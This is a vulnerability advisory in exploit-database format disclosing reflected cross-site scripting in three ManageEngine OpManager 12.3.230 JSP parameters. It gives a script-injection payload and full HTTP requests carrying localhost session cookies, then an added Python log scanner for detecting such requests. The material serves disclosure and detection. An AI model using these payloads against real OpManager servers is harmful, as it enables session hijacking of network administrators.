# Exploit Title: ManageEngine OpManager 12.3.230 Cross-Site Scripting
# Date: 29.11.2018
# Exploit Author: "Furkan Sayım" from Seccops - Siber Güvenlik Hizmetleri (https://seccops.com)
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/cgi-bin/download_exe?id=4-806-2018-11-29-12-34-12-7271
# Version: 12.3.230
# Tested on: Windows 10
# Vulnerability Type: Cross-site Scripting
# CVE: -
Vulnerability: http://localhost:8060/apiclient/ember/googleMap.jsp?widgetId=
Payload: '"--></style></scRipt><scRipt>alert("SeccopsSiberGuvenlikHizmetleri")</scRipt>
HTTP Request:
GET /apiclient/ember/googleMap.jsp?widgetId=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22SeccopsSiberGuvenlikHizmetleri%22)%3C/scRipt%3E HTTP/1.1
Host: localhost:8060
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: f2RedirectUrl=http%3A%2F%2Flocalhost%3A8060%2Fapiclient%2Fember%2Findex.jsp%23%2FSettings%2FBasic%2FMail; encryptPassForAutomaticSignin=82a3161ad68e57b6; userNameForAutomaticSignin=admin; domainNameForAutomaticSignin=Authenticator; signInAutomatically=true; authrule_name=Authenticator; JSESSIONID=E6E9B94C25A6ED265D4479E053B31823; NFA__SSO=CBF02EFBF3870822C071502B78AE989C; opmcsrfcookie=c27ae172-2394-4aae-a515-04054c4fc975
Connection: close
---------------------
Vulnerability: http://localhost:8060/apiclient/ember/rdpdirect.jsp?server=
Payload: '"--></style></scRipt><scRipt>alert("SeccopsSiberGuvenlikHizmetleri")</scRipt>
HTTP Request:
GET /apiclient/ember/rdpdirect.jsp?server=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22SeccopsSiberGuvenlikHizmetleri%22)%3C/scRipt%3E HTTP/1.1
Host: localhost:8060
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: f2RedirectUrl=http%3A%2F%2Flocalhost%3A8060%2Fapiclient%2Fember%2Findex.jsp%23%2FSettings%2FBasic%2FMail; encryptPassForAutomaticSignin=82a3161ad68e57b6; userNameForAutomaticSignin=admin; domainNameForAutomaticSignin=Authenticator; signInAutomatically=true; authrule_name=Authenticator; JSESSIONID=E6E9B94C25A6ED265D4479E053B31823; NFA__SSO=CBF02EFBF3870822C071502B78AE989C; opmcsrfcookie=c27ae172-2394-4aae-a515-04054c4fc975
Connection: close
---------------------
Vulnerability: http://localhost:8060/apiclient/ember/googleMap.jsp?type=cctv&cctvID=
Payload: '"--></style></scRipt><scRipt>alert("SeccopsSiberGuvenlikHizmetleri")</scRipt>
HTTP Request:
GET /apiclient/ember/googleMap.jsp?type=cctv&cctvID=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22SeccopsSiberGuvenlikHizmetleri%22)%3C/scRipt%3E HTTP/1.1
Host: localhost:8060
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: f2RedirectUrl=http%3A%2F%2Flocalhost%3A8060%2Fapiclient%2Fember%2Findex.jsp%23%2FSettings%2FBasic%2FMail; encryptPassForAutomaticSignin=82a3161ad68e57b6; userNameForAutomaticSignin=admin; domainNameForAutomaticSignin=Authenticator; signInAutomatically=true; authrule_name=Authenticator; JSESSIONID=E6E9B94C25A6ED265D4479E053B31823; NFA__SSO=CBF02EFBF3870822C071502B78AE989C; opmcsrfcookie=c27ae172-2394-4aae-a515-04054c4fc975
Connection: close
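---------------------
Detection example (added here, not part of the original advisory or the vendor's code): a log check that flags requests to the three endpoint/parameter pairs listed above when the decoded parameter value carries HTML markup characters. The combined access-log format, the case-insensitive path match and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoint -> parameters named in the advisory (compared case-insensitively).
WATCHED = {
    "/apiclient/ember/googlemap.jsp": {"widgetid", "cctvid"},
    "/apiclient/ember/rdpdirect.jsp": {"server"},
}
# Heuristic: characters needed to break out of HTML, attribute or script context.
MARKUP = re.compile(r"[<>\"']")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (catches double encoding)."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def suspicious_params(target):
    """Return [(param, decoded_value)] for watched parameters carrying markup."""
    parts = urlsplit(target)
    watched = WATCHED.get(parts.path.lower(), set())
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = decode_fully(value)
        if name.lower() in watched and MARKUP.search(value):
            hits.append((name, value))
    return hits

def scan(log_lines):
    """Return [(line_number, param, value)] for flagged access-log lines."""
    found = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if match:
            found += [(number, n, v) for n, v in suspicious_params(match.group(1))]
    return found

# Constructed sample lines (combined log format); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Nov/2018:10:00:01 +0000] "GET /apiclient/ember/googleMap.jsp?widgetId=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [29/Nov/2018:10:00:05 +0000] "GET /apiclient/ember/rdpdirect.jsp?server=%22%3E%3Cb%3E HTTP/1.1" 200 734',
    '192.0.2.77 - - [29/Nov/2018:10:00:09 +0000] "GET /apiclient/ember/googleMap.jsp?type=cctv&cctvID=%253Cb%253E HTTP/1.1" 200 5120',
    '192.0.2.10 - - [29/Nov/2018:10:00:12 +0000] "GET /apiclient/ember/index.jsp?q=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit only shows that markup reached one of the reflected parameters; the fix itself is context-aware output encoding of these values in the JSP pages or a vendor update.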